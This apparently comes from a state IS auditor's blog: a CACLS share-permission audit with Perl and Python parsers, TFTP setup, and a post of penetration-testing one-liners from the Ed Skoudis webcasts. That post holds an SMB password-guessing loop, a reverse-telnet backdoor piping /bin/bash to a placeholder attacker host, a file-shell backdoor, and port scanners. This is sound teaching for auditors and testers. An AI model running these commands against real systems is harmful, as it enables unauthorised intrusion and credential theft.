Information Systems Auditing

A collection of links, documents, and thoughts of a State IS auditor.

Auditing Folder (and subfolder) Permissions using CACLS

without comments

CACLS.exe is a great builtin Windows utility that allows you to list the permissions on a file or folder.  This command has been used in an audit to get the permissions of the folders on an agency file server that served the “private” shares to each Domain user.  The findings we would be looking for when examining the results are improper access to the “private” shares by other Domain users.

For CACLS options and how to interpret the results see this site.

The command that I run is as follows:
c:\>for /f "delims=" %a in ('dir /b') do @cacls "%a" >> savefile.txt

Once results are obtained they need to be parsed so they can be analyzed.  I have written a perl script to add the correct folder name to each permission.  This is so they can be sorted by permission in your spreadsheet application of choice.


#!/usr/bin/perl
use strict;
use warnings;

# caclsparse.pl - turn saved cacls output into folder,permission CSV rows
my $numArgs = @ARGV;
if ($numArgs < 2) {
  print "Invalid Number of Arguments\n";
  print "caclsparse.pl <filename> <foldername>\n\n";
  print "foldername example:  D:\\\\Share\n";
  print "You need to escape the backslash twice.\n";
  exit;
}

my ($infile, $share) = @ARGV;
# match the share path literally, so the backslashes in it are not regex escapes
my $share_re = quotemeta($share);

#open the file
open(my $dat, '<', $infile) || die("Cannot open $infile: $!");

#save file contents into an array, dropping the CRLF/LF line endings
#(the file was written by cacls on Windows)
my @raw_data = <$dat>;
close($dat);
s/\r?\n\z// for @raw_data;

#Cycle through the entire array
for (my $count = 0; $count <= $#raw_data; $count++) {

  #pull folder name, split it, and print it
  #the first record in each grouping is the only record with the folder name;
  #cacls pads the following records with spaces out to the same column
  if ($raw_data[$count] =~ /^$share_re/) {
    my $x = 0;
    my $next = $count < $#raw_data ? $raw_data[$count + 1] : '';
    while (substr($next, $x, 1) eq " ") {
      $x++;
    }
    #NOTE: a folder with a single ACE has no padded continuation line,
    #so $x stays 0 and the folder/permission split below is not reliable
    my $folder      = substr($raw_data[$count], 0, $x - 1);
    my $permissions = substr($raw_data[$count], $x);
    print "$folder,$permissions\n";

    #cycle through the permissions listed below the folder name
    for (my $c = $count + 1; $c <= $#raw_data; $c++) {

      #stop when you get to the next folder item
      last if $raw_data[$c] =~ /^$share_re/;

      #clear all whitespace around the permission
      $permissions = substr($raw_data[$c], $x);
      $permissions =~ s/^\s+//;
      $permissions =~ s/\s+$//;
      print "$folder,$permissions\n";
    }
  }
}

Save the code and run it as follows:

$perl caclsparse.pl savefile.txt D:\\Share >> parseresults.csv

NOTE: I run it from Linux but ActivePerl for Windows will work as well. Installing perl is outside the scope of this posting.

Open parseresults.csv in Excel/OO Calcs/Gnumeric and begin analyzing the results!
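As an added example, not part of the original post: a short Python script that reads the folder,permission CSV produced by the parser and flags the finding described above, access to a user's private share by anyone other than that user, SYSTEM and Administrators. The AGENCY domain name, the sample rows and the baseline principals are assumptions.

```python
import csv
import io

# Constructed sample of caclsparse.pl output (folder,permission); AGENCY is an
# assumed domain name and none of these rows come from a real server.
SAMPLE_CSV = """\
D:\\Share\\alice,BUILTIN\\Administrators:(OI)(CI)F
D:\\Share\\alice,NT AUTHORITY\\SYSTEM:(OI)(CI)F
D:\\Share\\alice,AGENCY\\alice:(OI)(CI)C
D:\\Share\\bob,BUILTIN\\Administrators:(OI)(CI)F
D:\\Share\\bob,NT AUTHORITY\\SYSTEM:(OI)(CI)F
D:\\Share\\bob,AGENCY\\bob:(OI)(CI)C
D:\\Share\\bob,AGENCY\\Domain Users:(OI)(CI)R
D:\\Share\\carol,Everyone:(OI)(CI)F
"""

# Principals that belong on every private folder (assumed baseline for the server).
BASELINE = {"builtin\\administrators", "nt authority\\system"}


def parse_ace(permission):
    """Split a CACLS ACE such as 'AGENCY\\bob:(OI)(CI)C' into (principal, rights).
    The first colon ends the principal; inheritance flags stay with the rights."""
    principal, _, rights = permission.partition(":")
    return principal.strip(), rights.strip()


def find_findings(csv_text, domain):
    """Return (folder, principal, rights) for every ACE that is neither in the
    baseline nor the owner of the folder, i.e. the access an auditor questions."""
    findings = []
    for row in csv.reader(io.StringIO(csv_text)):
        if len(row) < 2:          # skip blank or malformed lines
            continue
        folder, permission = row[0], row[1]
        owner = folder.rstrip("\\").rsplit("\\", 1)[-1]   # last path component
        allowed = BASELINE | {f"{domain}\\{owner}".lower()}
        principal, rights = parse_ace(permission)
        if principal.lower() not in allowed:
            findings.append((folder, principal, rights))
    return findings


if __name__ == "__main__":
    for folder, principal, rights in find_findings(SAMPLE_CSV, "AGENCY"):
        print(f"{folder}: {principal} has {rights}")
```

Point it at parseresults.csv (read the file into a string) and the domain's NetBIOS name to get the list of ACEs worth following up on instead of sorting by hand.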

Written by admin

March 6th, 2009 at 7:13 am

Posted in Uncategorized

Penetration Testing Ninjitsu

Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans).  I highly recommend listening to these webcasts and downloading the slides for your reference.  I’m including the commands extracted from the slides that can be very useful for a penetration test.

Ninjitsu I

Ping Sweep
C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

Ninjitsu II

Linux Command-Line Port Scanner
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]

Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Ninjitsu III

Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface "wireless network connection" disable & ping -n 3 127.0.0.1 >nul & netsh interface set interface "wireless network connection" enable & ping -n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)

Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"

Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"

Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WAS-WindowsActivationService;WAS-ProcessModel;WAS-NetFxEnvironment;WAS-ConfigurationAPI

List Domain Password Settings
C:\>net accounts /domain

Written by admin

December 2nd, 2008 at 12:08 pm

Posted in Uncategorized

Auditing Windows Account Management

At the NSAA IT Conference and Workshop, put on by NASACT, I presented on Auditing Windows Account Management.  I’m posting the slides to my presentation as reference.  I would love any feedback from anybody who attended the presentation.  The tool PWDumpX was demonstrated during the presentation.  A document on how to use the tool to obtain Windows Domain account password hashes has been posted.

Written by admin

October 14th, 2008 at 8:41 am

Posted in Uncategorized

Setup TFTP

A TFTP server is an important tool for an Information Systems Auditor. It has come in handy in a couple of situations during an audit. The two that come to mind are retrieving Cisco configuration files and uploading Netcat during a SQL audit or SQL Injection test. This is a quick post on how I like to set up my TFTP server on Linux and Windows.

My Linux distro of choice is Ubuntu.

$sudo -s
#apt-get install atftpd
#mkdir /tftproot
#chmod 777 /tftproot
#atftpd --daemon /tftproot

That will get you started on Linux. For Windows I like the free tftp server you get from www.solarwinds.com. Download and install.  Create the directory C:\TFTP-Root.

Written by admin

September 19th, 2008 at 5:06 pm

Posted in Uncategorized

Hello Auditors!

Welcome to jedge.com.  I’m James Edge, the host of this site.  My goal for this site is to create a collaborative portal for documents, links, and thoughts regarding auditing Information System security at a state government level.  I’ve been working in state government for a few years with both New York and Georgia state and I hope to express my thoughts and opinions related to auditing with what I’ve experienced working for those governments.  Enjoy the site and feel free to post a comment for whatever reason.  I hope the feedback I receive will further improve the site.  Thanks.

Written by admin

September 11th, 2008 at 4:08 pm

Posted in Uncategorized